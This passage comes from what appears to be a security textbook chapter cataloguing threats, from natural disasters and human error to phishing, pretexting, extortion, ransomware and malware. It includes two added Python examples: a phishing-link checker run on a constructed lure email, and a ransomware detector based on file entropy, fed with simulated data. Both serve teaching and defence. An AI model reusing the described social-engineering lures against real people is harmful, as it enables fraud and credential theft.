nature as well as civil disorder and acts of war.

Fire
A structural fire can damage a building with computing equipment that comprises all or part of an information system.
Damage can also be caused by smoke or by water from sprinkler systems or firefighters. This threat can usually be
mitigated with fire casualty insurance or business interruption insurance.

Floods
Water can overflow into an area that is normally dry, causing direct damage to all or part of the information system or
the building that houses it. A flood might also disrupt operations by interrupting access to the buildings that house the
information system. This threat can sometimes be mitigated with flood insurance or business interruption insurance.

Earthquakes
An earthquake is a sudden movement of the earth’s crust caused by volcanic activity or the release of stress accumu-
lated along geologic faults. Earthquakes can cause direct damage to the information system or, more often, to the build-
ing that houses it. They can also disrupt operations by interrupting access to the buildings that house the information
system. In 2006, a large earthquake just off the coast of Taiwan severed several underwater communications cables,
shutting down Internet access for more than a month in China, Hong Kong, Taiwan, Singapore, and other countries
throughout the Pacific Rim. In 2013, major earthquakes and the resulting tsunami severed cables around Japan. In 2016,
several undersea cables around Singapore were damaged, resulting in substantial loss of communications capacity to
the island. In the United States, earthquakes impacted the country from Alaska to North Carolina in 2020. Most cause
some damage to property. Losses due to earthquakes can sometimes be mitigated with casualty insurance or business
interruption insurance, but earthquakes usually are covered by a separate policy.

Lightning
Lightning is an abrupt, discontinuous natural electric discharge in the atmosphere. Lightning usually damages all or part
of the information system and its power distribution components. It can also cause fires or other damage to the building
that houses the information system, and it can disrupt operations by interfering with access to those buildings. In 2012,
a lightning strike to a communications cable near Fort Wayne, Indiana, left almost 100,000 residents without phone and
Internet access. Damage from lightning can usually be prevented with specialized lightning rods placed strategically on
and around the organization’s facilities and by installing special circuit protectors in the organization’s electrical ser-
vice. Losses from lightning may be mitigated with multipurpose casualty insurance or business interruption insurance.

Landslides, Mudslides, and Avalanches


The downward slide of a mass of earth, rock, or snow can directly damage the information system or, more likely, the
building that houses it. Landslides, mudslides, and avalanches also disrupt operations by interfering with access to
the buildings that house the information system. This threat can sometimes be mitigated with casualty insurance or
business interruption insurance.

Tornados and Severe Windstorms


A tornado is a rotating column of air that can be more than a mile wide and whirl at destructively high speeds. Usually
accompanied by a funnel-shaped downward extension of a cumulonimbus cloud, tornados can directly damage all
or part of the information system or, more likely, the building that houses it. Tornadoes can also interrupt access to
the buildings that house the information system. Wind shear is a much smaller and linear wind effect, but it can have
similar devastating consequences. These threats can sometimes be mitigated with casualty insurance or business
interruption insurance.

Hurricanes, Typhoons, and Tropical Depressions


A severe tropical cyclone that originates in equatorial regions of the Atlantic Ocean or Caribbean Sea is referred to as
a hurricane, and one that originates in eastern regions of the Pacific Ocean is called a typhoon. Many hurricanes and
typhoons originate as tropical depressions—collections of multiple thunderstorms under specific atmospheric condi-
tions. Excessive rainfall and high winds from these storms can directly damage all or part of the information system or,
more likely, the building that houses it. Organizations in coastal or low-lying areas may suffer flooding as well. These
storms may also disrupt operations by interrupting access to the buildings that house the information system. This
threat can sometimes be mitigated with casualty insurance or business interruption insurance.

Tsunamis
A tsunami is a very large ocean wave caused by an underwater earthquake or volcanic eruption. These events can
directly damage the information system or the building that houses it. Organizations in coastal areas may experience
tsunamis. They may also disrupt operations through interruptions in access or electrical power to the buildings that
house the information system. This threat can sometimes be mitigated with casualty insurance or business interrup-
tion insurance.
While you might think a tsunami is a remote threat, much of the world’s coastal area is under some threat from
such an event. In 2011, the Fukushima Daiichi nuclear disaster resulted from an earthquake and subsequent tsunami;
the disruption to the Japanese economy directly and indirectly affected much of the world. The United States coastline
has exposure to tsunamis caused by severe earthquakes or landslides that might begin across the Atlantic Ocean,
Pacific Ocean, or the Gulf of Mexico.
The earthquake that shook Alaska in 2020 was expected to result in a significant tsunami. The U.S. Coast Guard
was mobilized, and the coastal regions were warned. Fortunately, the resulting tsunami only reached about a foot high,
almost indistinguishable from normal wave patterns.

To read about technology used to save lives after tsunamis, visit the Web site of NOAA’s National Weather Service
U.S. Tsunami Warning Center. From there, you can find out how state-of-the-art satellite, computer, and network
systems are used to notify people in the country about emergency tsunami events. You can see the Web page
at www.tsunami.gov.

Electrostatic Discharge
Electrostatic discharge (ESD), also known as static electricity, is usually little more than a nuisance. However, the mild
static shock we receive when walking across a carpet can be costly or dangerous when it ignites flammable mixtures
and damages costly electronic components. An employee walking across a carpet on a cool, dry day can generate
up to 12,000 volts of electricity. Humans cannot detect static electricity until it reaches around 1,500 volts. When it
encounters technology, especially computer hard drives, ESD can be catastrophic, as damage can be caused by as
little as 10 volts.22
Static electricity can draw dust into clean-room environments or cause products to stick together. The cost of ESD-
damaged electronic devices and interruptions to service can be millions of dollars for critical systems. ESD can also
cause significant loss of production time in information processing. Although ESD can disrupt information systems, it
is not usually an insurable loss unless covered by business interruption insurance.

Dust Contamination
Some environments are not friendly to the hardware components of information systems. Accumulation of dust and
debris inside systems can dramatically reduce the effectiveness of cooling mechanisms and potentially cause compo-
nents to overheat. Some specialized technology, such as CD or DVD optical drives, can suffer failures due to excessive
dust contamination. Because it can shorten the life of information systems or cause unplanned downtime, this threat
can disrupt normal operations.

Solar Activity
While most of us are protected by the earth’s atmosphere from the more dramatic effects of solar activity, such as
radiation and solar flares, our communications satellites bear the brunt of such exposure. Extreme solar activity can
affect power grids, however, as in Quebec in 1989, when solar currents in the magnetosphere affected power lines,
blowing out electric transformers and power stations. Business communications that are heavily dependent on satel-
lites should consider the potential for disruption.

Human Error or Failure


This category includes acts performed without intent or malicious purpose or in ignorance by an authorized user.
When people use information assets, mistakes happen. Similar errors happen when people fail to follow established
policy. Inexperience, improper training, and incorrect assumptions are just a few things that can cause human error
or failure. Regardless of the cause, even innocuous mistakes can produce extensive damage. In 2017, an employee
debugging an issue with the Amazon Web Services (AWS) billing system took more servers down than he was sup-
posed to, resulting in a chain reaction that took down several large Internet sites. It took time to restart the downed
systems, resulting in extended outages for several online vendors, while other sites were unable to fully operate due
to unavailable AWS services.23
In 1997, a simple keyboarding error caused worldwide Internet outages:

In April 1997, the core of the Internet suffered a disaster. Internet service providers lost connectivity
with other ISPs due to an error in a routine Internet router-table update process. The resulting outage
effectively shut down a major portion of the Internet for at least twenty minutes. It has been estimated
that about 45 percent of Internet users were affected. In July 1997, the Internet went through yet
another more critical global shutdown for millions of users. An accidental upload of a corrupt database
to the Internet’s root domain servers occurred. Because this provides the ability to address hosts on the
Net by name (i.e., eds.com), it was impossible to send e-mail or access Web sites within the .com and
.net domains for several hours. The .com domain comprises a majority of the commercial enterprise
users of the Internet.24

social engineering
The process of using interpersonal skills to convince people to reveal access credentials or other valuable information
to an attacker.

One of the greatest threats to an organization’s information security is its own employees, as they are the threat
agents closest to the information. Because employees use data and information in everyday activities to conduct the
organization’s business, their mistakes represent a serious threat to the confidentiality, integrity, and availability
of data—even, as Figure 2-8 suggests, relative to threats from outsiders. Employee mistakes can easily lead to
revelation of classified data, entry of erroneous data, accidental deletion or
modification of data, storage of data in unprotected areas, and failure to protect information. Leaving classified informa-
tion in unprotected areas, such as on a desktop, on a Web site, or even in the trash can, is as much a threat as a person
who seeks to exploit the information, because the carelessness can create a vulnerability and thus an opportunity for
an attacker. However, if someone damages or destroys data on purpose, the act belongs to a different threat category.
In 2014, New York’s Metro-North railroad lost power when one of its two power supply units was taken offline for
repairs. Repair technicians apparently failed to note the interconnection between the systems, resulting in a two-hour
power loss. Similarly, in 2016, Telstra customers in several major cities across Australia lost communications for more
than two hours due to an undisclosed human error.
Human error or failure often can be prevented with training, ongoing awareness activities, and controls. These
controls range from simple activities, such as requiring the user to type a critical command twice, to more complex
procedures, such as verifying commands by a second party. An example of the latter is the performance of key recov-
ery actions in PKI systems. Many military applications have robust, dual-approval controls built in. Some systems
that have a high potential for data loss or system outages use expert systems to monitor human actions and request
confirmation of critical inputs.
Humorous acronyms are commonly used when attributing problems to human error. They include PEBKAC (prob-
lem exists between keyboard and chair), PICNIC (problem in chair, not in computer), and ID-10-T error (idiot).

Social Engineering
In the context of information security, social engineering is used by attackers to gain system access or information
that may lead to system access. There are several social engineering techniques, which usually involve a perpetrator
posing as a person who is higher in the organizational hierarchy than the victim. To prepare for this false representa-
tion, the perpetrator already may have used social engineering tactics against others in the organization to collect
seemingly unrelated information that, when used together, makes the false representation more credible. For instance,
anyone can check a company’s Web site or even call the main switchboard to get the name of the CIO; an attacker
may then obtain even more information by calling others in the company and falsely asserting his or her authority
by mentioning the CIO’s name. Social engineering attacks may involve people posing as new employees or as current
employees requesting assistance to prevent getting fired. Sometimes attackers threaten, cajole, or beg to sway the
target. The infamous hacker Kevin Mitnick, whose exploits are detailed earlier in this module, once stated:

People are the weakest link. You can have the best technology; firewalls, intrusion-detection systems, biometric
devices … and somebody can call an unsuspecting employee. That’s all she wrote, baby. They got everything.25

Figure 2-8 The biggest threat—acts of human error or failure (panels: Tommy Twostory, convicted burglar; Elite Skillz,
wannabe hacker; Harriett Allthumbs, confused the copier with the shredder when preparing the annual sales report)

Business E-Mail Compromise (BEC)
A new type of social engineering attack has surfaced in the last few years. Business e-mail compromise (BEC) combines
the exploit of social engineering with the compromise of an organization’s e-mail system. An attacker gains access to
the system either through another social engineering attack or technical exploit, and then proceeds to request that
employees within the organization, usually administrative assistants to high-level executives, transfer funds to an
outside account or purchase gift cards and send them to someone outside the organization. According to the FBI,
almost 24,000 BEC complaints were filed in 2019, with projected losses of more than $1.7 billion. Reporting these
crimes quickly is the key to a successful resolution. The FBI Internet Crime Complaint Center’s Recovery Asset Team
has made great strides in freezing and recovering finances that are stolen through these types of scams, as long as
they are reported quickly and the perpetrators are inside the United States.26

business e-mail compromise (BEC)
A social engineering attack involving the compromise of an organization’s e-mail system followed by a series of forged
e-mail messages directing employees to transfer funds to a specified account, or to purchase gift cards and send them
to an individual outside the organization.

advance-fee fraud (AFF)
A form of social engineering, typically conducted via e-mail, in which an organization or some third party indicates
that the recipient is due an exorbitant amount of money and needs only to send a small advance fee or personal banking
information to facilitate the transfer.

Advance-Fee Fraud
Another social engineering attack called the advance-fee fraud (AFF), internationally known as the 4-1-9 fraud, is
named after a section of the Nigerian penal code. The perpetrators of 4-1-9 schemes often use the names of fictitious
companies, such as the Nigerian National Petroleum Company. Alternatively, they may invent other entities, such as a
bank, government agency, long-lost relative, lottery, or other nongovernmental organization. See Figure 2-9 for a sample
letter used for this type of scheme.
The scam is notorious for stealing funds from credulous people, first by requiring them to participate in a pro-
posed money-making venture by sending money up front, and then by soliciting an endless series of fees. These 4-1-9
schemes are even suspected to involve kidnapping, extortion, and murder. According to The 419 Coalition, more than
$100 billion has been swindled from victims as of 2020.27

You can go to the Advance Fee Fraud Coalition’s Web site to see how the Nigerian Government’s Economic and Financial
Crimes Commission is fighting AFF and 4-1-9 crimes. Visit https://efccnigeria.org/efcc/.

Phishing
Many other attacks involve social engineering. One such attack is described by the Computer Emergency Response
Team/Coordination Center (CERT/CC):

CERT/CC has received several incident reports concerning users receiving requests to take an action that
results in the capturing of their password. The request could come in the form of an e-mail message,
a broadcast, or a telephone call. The latest ploy instructs the user to run a “test” program, previously
installed by the intruder, which will prompt the user for his or her password. When the user executes
the program, the user’s name and password are e-mailed to a remote site.
These messages can appear to be from a site administrator or root. In reality, they may have been sent by an
individual at a remote site, who is trying to gain access or additional access to the local machine via the user’s
account.28

phishing
A form of social engineering in which the attacker provides what appears to be a legitimate communication (usually
e-mail), but it contains hidden or embedded code that redirects the reply to a third-party site in an effort to extract
personal or confidential information.

Figure 2-9 Example of a Nigerian 4-1-9 fraud letter

While this attack may seem crude to experienced users, the fact is that many e-mail users have fallen for it. These
tricks and similar variants are called phishing attacks. They gained national recognition with the AOL phishing attacks
that were widely reported in the late 1990s, in which attackers posing as AOL technicians attempted to get login
credentials from AOL subscribers. The practice became so widespread that AOL added a warning to all official
correspondence that no AOL employee would ever ask for password or billing information. Variants
of phishing attacks can leverage their purely social engineering aspects with a technical angle, such as that used in
pharming, spoofing, and redirection attacks, as discussed later in this module.
Another variant is spear phishing. While normal phishing attacks target as many recipients as possible, a spear
phisher sends a message to a small group or even one person. The message appears to be from an employer, a col-
league, or other legitimate correspondent. This attack sometimes targets users of a certain product or Web site. When
this attack is directed at a specific person, it is called spear phishing. When the intended victim is a senior executive,
it may be called whaling or whale phishing.
Phishing attacks use two primary techniques, often in combination with one another: URL manipulation and Web
site forgery. In Uniform Resource Locator (URL) manipulation, attackers send an HTML-embedded e-mail message or
a hyperlink whose HTML code opens a forged Web site. For example, Figure 2-10 shows an e-mail that appears to have
come from Regions Bank. Phishers typically use the names of large banks or retailers because potential targets are
more likely to have accounts with them. In Figure 2-11, the link appears to be to RegionsNetOnline, but the HTML code
actually links the user to a Web site in Poland. This is a very simple example; many phishing attackers use sophisti-
cated simulated Web sites in their e-mails, usually copied from actual Web sites. Companies that are commonly used
in phishing attacks include banks, lottery organizations, and software companies like Microsoft, Apple, and Google.
In the forged Web site shown in Figure 2-11, the page looks legitimate; when users click either of the bottom two
buttons—Personal Banking Demo or Enroll in RegionsNet—they are directed to the authentic bank Web page. The
Access Accounts button, however, links to another simulated page that looks just like the real bank login Web page.
When victims type their banking ID and password, the attacker records that information and displays a message that
the Web site is now offline. The attackers can use the recorded credentials to perform transactions, including fund
transfers, bill payments, or loan requests.

spear phishing
A highly targeted phishing attack.
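The URL-manipulation lure described above, checked the way a mail filter or awareness tool might: an added example (not the textbook’s) that parses the anchors of an HTML message and flags links whose visible text names one host while the href goes elsewhere, whose href is a bare IP address, or whose host is not under a trusted domain. The sample message, the regions-bank.example domain and the 203.0.113.7 address are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message, not the Figure 2-10 e-mail: the first link shows one
# address but points at a bare IP, the second is genuine, the third hides a
# look-alike host behind the trusted name. Hosts and addresses are reserved examples.
SAMPLE_EMAIL_HTML = """
<p>Dear customer, please confirm your account details:</p>
<a href="http://203.0.113.7/netonline/login">https://www.regions-bank.example/</a><br>
<a href="https://www.regions-bank.example/demo">Personal Banking Demo</a><br>
<a href="https://www.regions-bank.example.lookalike.example/login">Access Accounts</a>
"""

# Visible text that itself looks like a URL or a bare domain name.
URL_LIKE = re.compile(r"^(?:https?://|www\.)|^[\w-]+(?:\.[\w-]+)+(?:/\S*)?$", re.I)


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every anchor in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def is_ip_literal(host: str) -> bool:
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def belongs_to(host: str, trusted: str) -> bool:
    """True only for the trusted domain or a real subdomain of it; a host that merely
    contains the trusted name further left (the look-alike trick) does not qualify."""
    return host == trusted or host.endswith("." + trusted)


def classify_link(href: str, text: str, trusted_domains) -> list:
    """Reasons a link is suspicious; an empty list means no mismatch was found."""
    reasons = []
    href_host = host_of(href)
    if is_ip_literal(href_host):
        reasons.append("href points at a bare IP address")
    if URL_LIKE.match(text):
        text_host = host_of(text)
        if text_host != href_host:
            reasons.append(f"text shows {text_host} but href goes to {href_host}")
    if not any(belongs_to(href_host, d) for d in trusted_domains):
        reasons.append(f"{href_host} is not under a trusted domain")
    return reasons


def suspicious_links(html: str, trusted_domains) -> list:
    """Return (href, text, reasons) for each link with at least one reason."""
    parser = LinkExtractor()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        reasons = classify_link(href, text, trusted_domains)
        if reasons:
            flagged.append((href, text, reasons))
    return flagged


if __name__ == "__main__":
    for href, text, reasons in suspicious_links(SAMPLE_EMAIL_HTML, ["regions-bank.example"]):
        print(f"{text!r} -> {href}: {'; '.join(reasons)}")
```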

Figure 2-10 Phishing example: lure

Figure 2-11 Phishing example: fake Web site



People can use their Web browsers to report suspicious Web sites that might have been used in phishing attacks.
Figure 2-12 shows the Internal Revenue Service (IRS) Web site that provides instructions on reporting IRS-spoofed
phishing attacks.

Pretexting
Pretexting, sometimes referred to as phone phishing or voice phishing (vishing), is pure social engineering. The
attacker calls a potential victim on the telephone and pretends to be an authority figure to gain access to private or
confidential information, such as health, employment, or financial records. The attacker may impersonate someone who
is known to the potential victim only by reputation. If your telephone rings and the caller ID feature shows the name
of your bank, you might be more likely to reveal your account number. Likewise, if your phone displays the name of
your doctor, you may be more inclined to reveal personal information than you might otherwise. Be careful; VOIP phone
services have made it easy to spoof caller ID, and you can never be sure who you are talking to. Pretexting is
generally considered pretending to be a person you are not, whereas phishing is pretending to represent an
organization via a Web site or HTML e-mail. This can be a blurry distinction.

pretexting
A form of social engineering in which the attacker pretends to be an authority figure who needs information to confirm
the target’s identity, but the real object is to trick the target into revealing confidential information; commonly
performed by telephone.

Information Extortion
Information extortion, also known as cyberextortion, is common in the theft of credit card numbers. For example, the
Web-based retailer CD Universe was victimized by a theft of data files that contained customer credit card information.

information extortion
The act of an attacker or trusted insider who steals or interrupts access to information from a computer system and
demands compensation for its return or for an agreement not to disclose the information.

cyberextortion
See information extortion.

Source: Internal Revenue Service (IRS).

Figure 2-12 IRS phishing and online scams reporting Web site

The culprit was a Russian hacker named Maxus who hacked the online vendor and stole several hundred thou-
sand credit card numbers. When the company refused to pay the $100,000 blackmail, he posted the card num-
bers to a Web site, offering them to the criminal community. His Web site became so popular he had to restrict
access.29
Another incident of extortion occurred in 2008 when pharmacy benefits manager Express Scripts, Inc., fell victim to a hacker who demonstrated that he had access to 75 customer records and claimed to have access to millions more. The perpetrator demanded an undisclosed amount of money. The company notified the FBI and offered a $1 million reward for the arrest of the perpetrator. Express Scripts notified the affected customers, as required by various state laws. The company was obliged to pay undisclosed expenses for the notifications and was required to buy credit monitoring services for its customers in some states.30

In 2010, Anthony Digati allegedly threatened to conduct a spam attack on the insurance company New York Life. He reportedly sent dozens of e-mails to company executives threatening to conduct a negative image campaign by sending more than six million e-mails to people throughout the country. He then demanded approximately $200,000 to stop the attack, and next threatened to increase the demand to more than $3 million if the company ignored him. His arrest thwarted the spam attack.31

In 2012, a programmer from Walachi Innovation Technologies allegedly broke into the organization’s systems and changed the access passwords and codes, locking legitimate users out of the system. He then reportedly demanded $300,000 in exchange for the new codes. A court order eventually forced him to surrender the information to the organization. In Russia, a talented hacker created malware that installed inappropriate materials on an unsuspecting user’s system, along with a banner threatening to notify the authorities if a bribe was not paid. At 500 rubles (about $17), victims in Russia and other countries were more willing to pay the bribe than risk prosecution by less considerate law enforcement.32

Ransomware
The latest type of attack in this category is known as ransomware. Ransomware is a malware attack on the host system that denies access to the user and then offers to provide a key to allow access back to the user’s system and data for a fee. There are two types of ransomware: lockscreen and encryption. Lockscreen ransomware denies access to the user’s system simply by disabling access to the desktop and preventing the user from bypassing the ransom screen that demands payment. Encryption ransomware is far worse, in that it encrypts some or all of a user’s hard drive and then demands payment. (See Figure 2-13.) Common phishing mechanisms to get a user to download ransomware include pop-ups indicating that illegal information or malware was detected on the user’s system, threatening to notify law enforcement, or offering to delete the offending material if the user clicks a link or button.
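As an added example (not from the textbook), one way a defender can notice encryption ransomware doing what the paragraph describes: encrypted output is statistically close to random, so a burst of distinct files being rewritten as near-random data within a few seconds is a strong signal. All file paths, contents, timings and thresholds below are constructed, and the pseudo-ciphertext is a hash chain standing in for real encryption.

```python
import hashlib
import math
from collections import Counter
from dataclasses import dataclass


@dataclass
class WriteEvent:
    t: float        # seconds since the monitor started (constructed clock)
    path: str       # file that was written
    content: bytes  # bytes written to it


def shannon_entropy(data: bytes) -> float:
    """Empirical entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(content: bytes, threshold: float = 7.5, min_size: int = 256) -> bool:
    """Ciphertext sits near 8 bits/byte; text and code are far lower. Tiny
    files give unreliable estimates, so they are ignored."""
    return len(content) >= min_size and shannon_entropy(content) >= threshold


def detect_ransomware(events, window: float = 10.0, min_files: int = 5):
    """Return the time at which `min_files` distinct files had been rewritten
    as near-random data inside a `window`-second span, or None if never."""
    recent = []  # (time, path) of suspicious writes still inside the window
    for ev in sorted(events, key=lambda e: e.t):
        if not looks_encrypted(ev.content):
            continue
        recent.append((ev.t, ev.path))
        recent = [(t, p) for t, p in recent if ev.t - t <= window]
        if len({p for _, p in recent}) >= min_files:
            return ev.t
    return None


def pseudo_ciphertext(seed: str, size: int) -> bytes:
    """Constructed stand-in for ciphertext: a SHA-256 chain has the
    statistical profile of encrypted data without being encryption."""
    out, block = bytearray(), seed.encode()
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:size])


def build_sample_events():
    """Constructed activity: six ordinary document saves spread over a minute,
    then a 2.8-second burst in which eight files are rewritten as near-random
    data. Returns (benign_only, benign_plus_burst)."""
    text = b"Quarterly figures, draft 3. Revenue up 4%, costs flat.\n" * 20
    benign = [
        WriteEvent(10.0 * i, f"/home/alice/docs/report{i}.txt", text + bytes([65 + i]) * 8)
        for i in range(6)
    ]
    burst = [
        WriteEvent(100.0 + 0.4 * i, f"/home/alice/docs/report{i}.txt.locked",
                   pseudo_ciphertext(f"victim-file-{i}", 4096))
        for i in range(8)
    ]
    return benign, benign + burst


if __name__ == "__main__":
    benign, mixed = build_sample_events()
    print("benign only:", detect_ransomware(benign))   # None
    print("with burst :", detect_ransomware(mixed))    # 101.6 (fifth file in the burst)
```

The alert fires on the fifth distinct high-entropy rewrite inside the window, which is early enough that most of the user's files are still intact.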
In 2013, a virus named CryptoLocker made the headlines as one of the first examples of this new type of malware. More than $100 million in losses were attributed to this ransomware before U.S. federal agents, working with law enforcement from other countries, identified the culprits and seized their systems. The hackers behind CryptoLocker also ran Gameover Zeus Botnet, a server farm that used other hackers to spread the malware. The leader of the hacker group was the Russian hacker Evgeniy Mikhailovich Bogachev, a.k.a. Slavik, who is still at large and still listed on the FBI’s Cyber Most Wanted.33

In 2017, the ransomware WannaCry made the headlines as it swept through cyberspace, locking systems and demanding payments in Bitcoin. The ransomware attack was cut short when a researcher discovered a flaw in the attack that contained a kill switch, preventing the attack from spreading. Software companies like Microsoft quickly issued patches that further stopped the infection. Several governments asserted that the North Korean government was behind the attack.34

In 2019, the FBI’s Internet Crime Complaint Center received more than 2,000 complaints identified as ransomware, with estimated losses of almost $9 million.35

ransomware: Computer software specifically designed to identify and encrypt valuable information in a victim’s system in order to extort payment for the key needed to unlock the encryption.

For a list of prominent ransomware investigations and arrests, visit www.technology.org/2016/11/21/ransomware-authors-arrest-cases/.

Figure 2-13 Ransomware notification screen

Sabotage or Vandalism
This category of threat involves the deliberate sabotage of a computer system or business or acts of vandalism to destroy an asset or damage the image of an organization. These acts can range from petty vandalism by employees to organized sabotage against an organization.

Although they might not be financially devastating, attacks on the image of an organization are serious. Vandalism to a Web site can erode consumer confidence, diminishing an organization’s sales, net worth, and reputation. For example, in the early hours of July 13, 2001, a group known as Fluffi Bunni left its mark on the home page of the SysAdmin, Audit, Network, and Security (SANS) Institute, a cooperative research and education organization. This event was particularly embarrassing to SANS Institute management because the organization provides security instruction and certification. The defacement read, “Would you really trust these guys to teach you security?”36 At least one member of the group was subsequently arrested by British authorities.

Online Activism
There are innumerable reports of hackers accessing systems and damaging or destroying critical data. Hacked Web sites once made front-page news, as the perpetrators intended. The impact of these acts has lessened as the volume has increased. The Web site that acts as the clearinghouse for many hacking reports, attrition.org, has stopped cataloging all Web site defacements because the frequency of such acts has outstripped the ability of the volunteers to keep the site up to date.37

Compared to Web site defacement, vandalism within a network is more malicious in intent and less public. Today, security experts are noticing a rise in another form of online vandalism: hacktivist or cyberactivist operations. For example, in November 2009, a group calling itself “antifascist hackers” defaced the Web site of Holocaust denier and Nazi sympathizer David Irving. They also released his private e-mail correspondence, secret locations of events on his speaking tour, and detailed information about people attending those events, among them members of various white supremacist organizations. This information was posted on the Web site WikiLeaks, an organization that publishes sensitive and classified information provided by anonymous sources.38

hacktivist: A hacker who seeks to interfere with or disrupt systems to protest the operations, policies, or actions of an organization or government agency.

cyberactivist: See hacktivist.

Leveraging online social media resources can sometimes cross over into unethical or even illegal territory. For example, activists engage in a behavior known as doxing to locate or steal confidential and personal records and then release them publicly to embarrass political opponents.

Figure 2-14 illustrates how Greenpeace, a well-known environmental activist organization, once used its Web presence to recruit cyberactivists.

Cyberterrorism and Cyberwarfare
A much more sinister form of activism—related to hacking—is cyberterrorism, practiced by cyberterrorists. The United States and other governments are developing security measures intended to protect critical computing and communications networks as well as physical and power utility infrastructures.

In the 1980s, Barry Collin, a senior research fellow at the Institute for Security and Intelligence in California, coined the term “cyberterrorism” to refer to the convergence of cyberspace and terrorism. Mark Pollitt, special agent for the FBI, offers a working definition: “Cyberterrorism is the premeditated, politically motivated attack against information, computer systems, computer programs, and data which result in violence against noncombatant targets by subnational groups or clandestine agents.”39

Cyberterrorism has thus far been largely limited to acts such as the defacement of NATO Web pages during the war in Kosovo. Some industry observers have taken the position that cyberterrorism is not a real threat, but instead is merely hype that distracts from more concrete and pressing information security issues that do need attention.

doxing: A practice of using online resources to find and then disseminate compromising information, perhaps without lawful authority, with the intent to embarrass or harm the reputation of an individual or organization. The term originates from dox, an abbreviation of documents.

cyberterrorism: The conduct of terrorist activities via networks or Internet pathways.

cyberterrorist: A hacker who attacks systems to conduct terrorist activities via networks or Internet pathways.

Figure 2-14 Cyberactivists wanted

However, further instances of cyberterrorism have begun to surface. According to Dr. Mudawi Mukhtar Elmusharaf at the Computer Crime Research Center, “on October 21, 2002, a distributed denial-of-service (DDoS) attack struck the 13 root servers that provide the primary road map for all Internet communications. Nine servers out of these 13 were jammed. The problem was taken care of in a short period of time.”40 While this attack was significant, the results were not noticeable to most users of the Internet. A news report shortly after the event noted that “the attack, at its peak, only caused 6 percent of domain name service requests to go unanswered [… and the global] DNS system normally responds almost 100 percent of the time.”41

Internet servers were again attacked on February 6, 2007, with four Domain Name System (DNS) servers targeted. However, the servers managed to contain the attack. It was reported that the U.S. Department of Defense was on standby to conduct a military counterattack if the cyberattack had succeeded.42 In 2011, China confirmed the existence of a nation-sponsored cyberterrorism organization known as the Cyber Blue Team, which is used to infiltrate the systems of foreign governments.

Government officials are concerned that certain foreign countries are “pursuing cyberweapons the same way they are pursuing nuclear weapons.”43 Some of these cyberterrorist attacks are aimed at disrupting government agencies, while others seem designed to create mass havoc with civilian and commercial industry targets. However, the U.S. government conducts its own cyberwarfare actions, having reportedly targeted overseas efforts to develop nuclear enrichment plants by hacking into and destroying critical equipment, using the infamous Stuxnet worm to do so.44

For more information about the evolving threat of cyberwarfare, visit a leading think tank, the RAND Corporation, to read research reports and commentary from leaders in the field (www.rand.org/topics/cyber-warfare.html).

Positive Online Activism
Not all online activism is negative. Social media outlets, such as Facebook, Twitter, and YouTube, are commonly used to perform fund-raising, raise awareness of social issues, gather support for legitimate causes, and promote involvement. Modern business organizations try to leverage social media and online activism to improve their public image and increase awareness of socially responsible actions.

Software Attacks
Deliberate software attacks occur when an individual or group designs and deploys software to attack a system. This attack can consist of specially crafted software that attackers trick users into installing on their systems. This software can be used to overwhelm the processing capabilities of online systems or to gain access to protected systems by hidden means.

cyberwarfare: Formally sanctioned offensive operations conducted by a government or state against information or systems of another government or state; sometimes called information warfare.

Malware
Malware, also referred to as malicious code or malicious software, includes the viruses, worms, and other scripts and applications designed to harm a target computer system. Other attacks that use software, like redirect attacks and denial-of-service attacks, also fall under this threat. These software components or programs are designed to damage, destroy, or deny service to targeted systems. Note that the terminology used to describe malware is often not mutually exclusive; for instance, Trojan horse malware may be delivered as a virus, a worm, or both.

Malicious code attacks include the execution of viruses, worms, Trojan horses, and active Web scripts with the intent to destroy or steal information. The most state-of-the-art malicious code attack is the polymorphic worm, or multivector worm. These attack programs use up to six known attack vectors to exploit a variety of vulnerabilities in common information system devices. Many successful malware attacks are completed using techniques that are widely known; some have been in use for years. When an attack makes use of malware that is not yet known by the antimalware software companies, it is said to be a zero-day attack.

malware: Computer software specifically designed to perform malicious or unwanted actions.

malicious code: See malware.

malicious software: See malware.

zero-day attack: An attack that makes use of malware that is not yet known by the antimalware software companies.

Other forms of malware include covert software applications—bots, spyware, and adware—that are designed to work out of users’ sight or be triggered by an apparently innocuous user action. Bots are often the technology used to implement Trojan horses, logic bombs, back doors, and spyware.45 Spyware is placed on a computer to secretly gather information about the user and report it. One type of spyware is a Web bug, a tiny graphic that is referenced within the Hypertext Markup Language (HTML) content of a Web page or e-mail to collect information about the user viewing the content. Another form of spyware is a tracking cookie, which is placed on users’ computers to track their activity on different Web sites and create a detailed profile of their behavior.46 Each of these hidden code components can be used to collect user information that could then be used in a social engineering or identity theft attack.

For more information about current events in malware, visit the U.S. Computer Emergency Readiness Team (US-CERT) Web site, and go to its Current Activity page at https://us-cert.cisa.gov/ncas/current-activity. US-CERT is part of the Department of Homeland Security.

adware: Malware intended to provide undesired marketing and advertising, including pop-ups and banners on a user’s screens.

spyware: Any technology that aids in gathering information about people or organizations without their knowledge.

Table 2-7 draws on three surveys to list some of the malware that has had the biggest impact on computer users to date. While this table may seem out of date, the values still hold up as of mid-2020. It seems that newer malware cannot break into the all-time top 10, possibly because of the proliferation of malware variants and do-it-yourself malware kits. It’s hard for any one new piece of malware to “break out” when so many variations are in play. It seems we are entering the days of precisely targeted malware.

Table 2-7 The Most Dangerous Malware Attacks to Date47,48,49

Malware | Type | Year | Estimated Number of Systems Infected | Estimated Financial Damage
CIH, a.k.a. Chernobyl | Memory-resident virus | 1998 | Unknown | $250 million
